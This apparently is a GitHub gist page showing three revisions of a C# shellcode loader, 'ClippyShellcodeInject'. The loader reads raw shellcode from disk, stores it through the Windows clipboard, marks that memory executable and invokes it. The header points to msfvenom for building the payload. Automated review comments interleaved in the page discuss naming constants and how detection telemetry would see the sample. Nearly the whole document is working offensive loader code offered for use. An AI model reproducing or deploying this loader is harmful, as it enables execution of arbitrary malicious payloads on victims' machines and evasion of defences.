Created
November 25, 2021 09:17
Revisions
Wra7h revised this gist
Nov 22, 2021 . 1 changed file with 6 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -19,7 +19,12 @@ static void Main(string[] args) OpenClipboard(IntPtr.Zero); GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned); IntPtr payloadpointer = payloadArray.AddrOfPinnedObject(); // SetClipBoardData() formats that work: // CF_BITMAP = 0x2, CF_DSPBITMAP = 0x0082, CF_PALETTE = 0x9 // https://docs.microsoft.com/en-us/windows/win32/dataxchg/standard-clipboard-formats IntPtr scData = SetClipboardData(0x2, payloadpointer); //CF_BITMAP = 0x2 CloseClipboard(); uint oldProtect = 0; //Old protect is RW by default if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) -
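Review bot: The call `SetClipboardData(0x2, payloadpointer)` and the `0x20/*RX*/` argument to `VirtualProtectEx` still pass bare literals explained only by trailing comments, even though the comment block added just above them lists the clipboard formats by name. Declaring `const uint CF_BITMAP = 0x2;` and `const uint PAGE_EXECUTE_READ = 0x20;` and passing those would let a reader or a source-level scan match the clipboard write and the protection change by name. Those are the two calls an analyst triaging this sample would look for. The comment `//Old protect is RW by default` states an assumption, since `oldProtect` is never inspected in the visible lines; it would read more accurately as `// oldProtect receives the previous protection; not checked here`. Main begins and ends outside this hunk.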
Wra7h revised this gist
Nov 21, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,6 @@ // Using the clipboard as your code cave. // Generate your shellcode with msfvenom or whatever // Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin> // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs using System; -
Wra7h created this gist
Nov 20, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,47 @@ // Using the clipboard as your code cave. // Generate your shellcode with msfvenom or whatever // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs using System; using System.IO; using System.Runtime.InteropServices; namespace ClippySCInject { class Program { private delegate IntPtr test(); static void Main(string[] args) { byte[] payload = File.ReadAllBytes(@"C:\path\to\raw\shellcode.bin"); OpenClipboard(IntPtr.Zero); GCHandle payloadArray = GCHandle.Alloc(payload, GCHandleType.Pinned); IntPtr payloadpointer = payloadArray.AddrOfPinnedObject(); IntPtr scData = SetClipboardData(2, payloadpointer); CloseClipboard(); uint oldProtect = 0; //Old protect is RW by default if (VirtualProtectEx(GetCurrentProcess(), scData, (UIntPtr)payload.Length, 0x20/*RX*/, out oldProtect)) { test executesc = (test)Marshal.GetDelegateForFunctionPointer(scData, typeof(test)); executesc(); } } [DllImport("User32.dll", EntryPoint= "OpenClipboard", SetLastError= true)] private static extern bool OpenClipboard(IntPtr hWndNewOwner); [DllImport("User32.dll", SetLastError = true)] static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem); [DllImport("user32.dll", SetLastError = true)] static extern bool CloseClipboard(); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr GetCurrentProcess(); } }
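Review bot: Main has no comment describing the sequence it performs, and the header comments cover only how to build the file, so a reader has to reconstruct the behaviour from the P/Invoke calls. A comment above `OpenClipboard(IntPtr.Zero)` such as `// Sequence: file bytes are pinned and passed to SetClipboardData; the returned pointer is changed to PAGE_EXECUTE_READ (0x20) and invoked through a delegate.` would state it once. An in-process change to an executable protection followed by an indirect call through `Marshal.GetDelegateForFunctionPointer` is presumably what memory-protection telemetry would surface for this sample, so naming it in the source helps anyone writing or testing a detection against it. The declarations are also inconsistent: `VirtualProtectEx` omits `SetLastError = true` while the other imports set it, and access modifiers and DLL-name casing vary between them. The delegate type is named `test`, which says nothing about its role.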